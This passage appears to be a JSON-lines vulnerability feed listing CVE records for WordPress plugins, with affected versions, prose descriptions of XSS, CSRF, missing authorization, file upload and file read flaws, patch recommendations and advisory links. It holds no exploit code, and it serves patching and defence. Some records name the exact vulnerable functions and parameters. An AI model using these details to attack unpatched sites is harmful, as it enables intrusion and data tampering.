{"CVE_ID":"CVE-2024-4038","slug":"back-in-stock-notifier-for-woocommerce","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"The The Back In Stock Notifier for WooCommerce | WooCommerce Waitlist Pro plugin for WordPress for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.3.1. This is due to the plugin for WordPress allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080830%40back-in-stock-notifier-for-woocommerce&new=3080830%40back-in-stock-notifier-for-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3080830%40back-in-stock-notifier-for-woocommerce&new=3080830%40back-in-stock-notifier-for-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f59489-9bff-4d22-8f99-6ea52d702ecf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7f59489-9bff-4d22-8f99-6ea52d702ecf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4482","slug":"amazon-auto-links","versionImpact":"5.3.1","versionEndExcluding":"5.3.2","description":"The Auto Amazon Links plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the style parameter in versions up to, and including, 5.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2961861%40amazon-auto-links%2Ftrunk&old=2896127%40amazon-auto-links%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2961861%40amazon-auto-links%2Ftrunk&old=2896127%40amazon-auto-links%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11ffb8a1-55d2-44c5-bcd2-ba866b94e8bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11ffb8a1-55d2-44c5-bcd2-ba866b94e8bc?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6756","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpw_auto_poster_get_image_path' function in all versions up to, and including, 5.3.14. This makes it possible for authenticated attackers, with Contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible. An attacker can use CVE-2024-6754 to exploit with subscriber-level access.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24e00c0d-08ff-4c68-a1dd-77b513545efd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/24e00c0d-08ff-4c68-a1dd-77b513545efd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6755","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the \u2018wpw_auto_poster_quick_delete_multiple\u2019 function in all versions up to, and including, 5.3.14. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9b1044d-6858-498f-9b89-352650061858?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9b1044d-6858-498f-9b89-352650061858?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6754","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to unauthorized modification of data to a missing capability check on the \u2018wpw_auto_poster_update_tweet_template\u2019 function in all versions up to, and including, 5.3.14. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary post metadata.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72934d2f-fd52-46d1-8cf9-9a20968899f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72934d2f-fd52-46d1-8cf9-9a20968899f7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6753","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018mapTypes\u2019 parameter in the 'wpw_auto_poster_map_wordpress_post_type' AJAX function in all versions up to, and including, 5.3.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c268a6d-dfb4-4a9d-802e-80e5c1c53ca2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c268a6d-dfb4-4a9d-802e-80e5c1c53ca2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6752","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018wp_name\u2019 parameter in the 'wpw_auto_poster_map_wordpress_post_type' AJAX function in all versions up to, and including, 5.3.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b9e8a0-96bb-4b36-b4e8-ec9e3f137835?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39b9e8a0-96bb-4b36-b4e8-ec9e3f137835?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6751","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.3.14. This is due to missing or incorrect nonce validation on multiple functions. This makes it possible for unauthenticated attackers to add, modify, or delete post meta and plugin options.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7aceccc-7004-42f2-b085-eade9c45141c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7aceccc-7004-42f2-b085-eade9c45141c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6750","slug":"social-auto-poster","versionImpact":"5.3.14","versionEndExcluding":"5.3.15","description":"The Social Auto Poster plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 5.3.14. This makes it possible for unauthenticated attackers to add, modify, or delete post meta and plugin options.","recommendation":"Update to version 5.3.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36b58a4f-0761-4775-9010-9c77d4019c44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36b58a4f-0761-4775-9010-9c77d4019c44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-auto-poster-wordpress-scheduler-marketing-plugin\\\/5754169\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3472","slug":"modal-window","versionImpact":"5.3.9","versionEndExcluding":"5.3.10","description":"The Modal Window  WordPress plugin before 5.3.10 does not have CSRF check in place when bulk deleting modals, which could allow attackers to make a logged in admin delete them via a CSRF attack","recommendation":"Update to version 5.3.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d42f74dd-520f-40aa-9cf0-3544db9562c7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d42f74dd-520f-40aa-9cf0-3544db9562c7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"profit-button","versionEndExcluding":"5.3.1","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0940","slug":"profilegrid-user-profiles-groups-and-communities","versionEndExcluding":"5.3.1","description":"The ProfileGrid WordPress plugin before 5.3.1 provides an AJAX endpoint for resetting a user password but does not implement proper authorization. This allows a user with low privileges, such as subscriber, to change the password of any account, including Administrator ones.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56744f72-2d48-4f42-8195-24b4dd951bb5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/56744f72-2d48-4f42-8195-24b4dd951bb5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10825","slug":"hide-my-wp","versionImpact":"5.3.01","versionEndExcluding":"5.3.02","description":"The Hide My WP Ghost \u2013 Security & Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the URL in all versions up to, and including, 5.3.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"Update to version 5.3.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c467a634-d5cf-4e80-9a64-009cdad2a684?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c467a634-d5cf-4e80-9a64-009cdad2a684?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.3.01\\\/classes\\\/Tools.php#L633\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.3.01\\\/classes\\\/Tools.php#L633\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.3.01\\\/classes\\\/Tools.php#L638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.3.01\\\/classes\\\/Tools.php#L638\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186489\\\/hide-my-wp\\\/trunk\\\/classes\\\/Tools.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3186489\\\/hide-my-wp\\\/trunk\\\/classes\\\/Tools.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13803","slug":"essential-blocks","versionImpact":"5.2.3","versionEndExcluding":"5.3.0","description":"The Essential Blocks \u2013 Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-marker\u2019 parameter in all versions up to, and including, 5.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3.0, or a newer patched version","refs":"[{\"url\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/essential-blocks\\\/assets\\\/admin\\\/editor\\\/editor.js\",\"name\":\"http:\\\/\\\/localhost:1337\\\/wp-content\\\/plugins\\\/essential-blocks\\\/assets\\\/admin\\\/editor\\\/editor.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242493\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242493\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efdeca40-e021-478f-af75-c5566ae70735?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/efdeca40-e021-478f-af75-c5566ae70735?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13805","slug":"file-manager-advanced","versionImpact":"5.2.14","versionEndExcluding":"5.3.0","description":"The Advanced File Manager \u2014 Ultimate WordPress File Manager and Document Library Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 5.2.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, and granted permissions by an Administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 5.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/file-manager-advanced\\\/trunk\\\/application\\\/class_fma_connector.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249482\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249482\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fc6cc1b-7d49-48cd-9bce-d37c6dcfece9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fc6cc1b-7d49-48cd-9bce-d37c6dcfece9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4485","slug":"page-list","versionEndExcluding":"5.3","description":"The Page-list WordPress plugin before 5.3 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/685b068e-0727-45fb-bd8c-66bb1dc3a8e7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/685b068e-0727-45fb-bd8c-66bb1dc3a8e7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5218","slug":"g-business-reviews-rating","versionImpact":"5.2","versionEndExcluding":"5.3","description":"The Reviews and Rating \u2013 Google Reviews plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's file upload feature in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71408e0b-aed8-4077-add2-7f3b249e85f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/71408e0b-aed8-4077-add2-7f3b249e85f5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/g-business-reviews-rating\\\/tags\\\/5.1\\\/index.php#L804\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/g-business-reviews-rating\\\/tags\\\/5.1\\\/index.php#L804\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092202%40g-business-reviews-rating%2Ftrunk&old=3076444%40g-business-reviews-rating%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092202%40g-business-reviews-rating%2Ftrunk&old=3076444%40g-business-reviews-rating%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12500","slug":"philantro","versionImpact":"5.2","versionEndExcluding":"5.3","description":"The Philantro \u2013 Donations and Donor Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'donate' in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L140\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L140\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L167\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L229\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L229\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L398\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L398\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/philantro\\\/tags\\\/5.13\\\/philantro.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207274%40philantro&new=3207274%40philantro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207274%40philantro&new=3207274%40philantro&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207777%40philantro&new=3207777%40philantro&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207777%40philantro&new=3207777%40philantro&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cd2ad77-c5de-470d-bc17-729233e4ab92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0cd2ad77-c5de-470d-bc17-729233e4ab92?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2319","slug":"elisqlreports","versionImpact":"5.25.08","versionEndExcluding":"5.25.10","description":"The EZ SQL Reports Shortcode Widget and DB Backup plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions 4.11.13 to 5.25.08. This is due to missing or incorrect nonce validation on the 'ELISQLREPORTS_menu' function. This makes it possible for unauthenticated attackers to execute code on the server via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Version 5.25.10 adds a nonce check, which makes this vulnerability exploitable by admins only.","recommendation":"Update to version 5.25.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.13\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.13\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.15\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.15\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.33\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4..11.33\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.11.37\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.11.37\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.16.38\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.16.38\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.17.38\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.17.38\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.17.42\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/4.17.42\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/5.21.35\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/5.21.35\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/5.25.08\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/elisqlreports\\\/tags\\\/5.25.08\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eade6ab0-ff79-4107-83ce-e85b37d97442?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eade6ab0-ff79-4107-83ce-e85b37d97442?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8009","slug":"security-ninja","versionImpact":"5.242","versionEndExcluding":"5.243","description":"The Security Ninja \u2013 WordPress Security Plugin & Firewall plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 5.242 via the 'get_file_source' function. This makes it possible for authenticated attackers, with Administrator-level access and above, to extract sensitive data, including the contents of any file on the server.","recommendation":"Update to version 5.243, or a newer patched 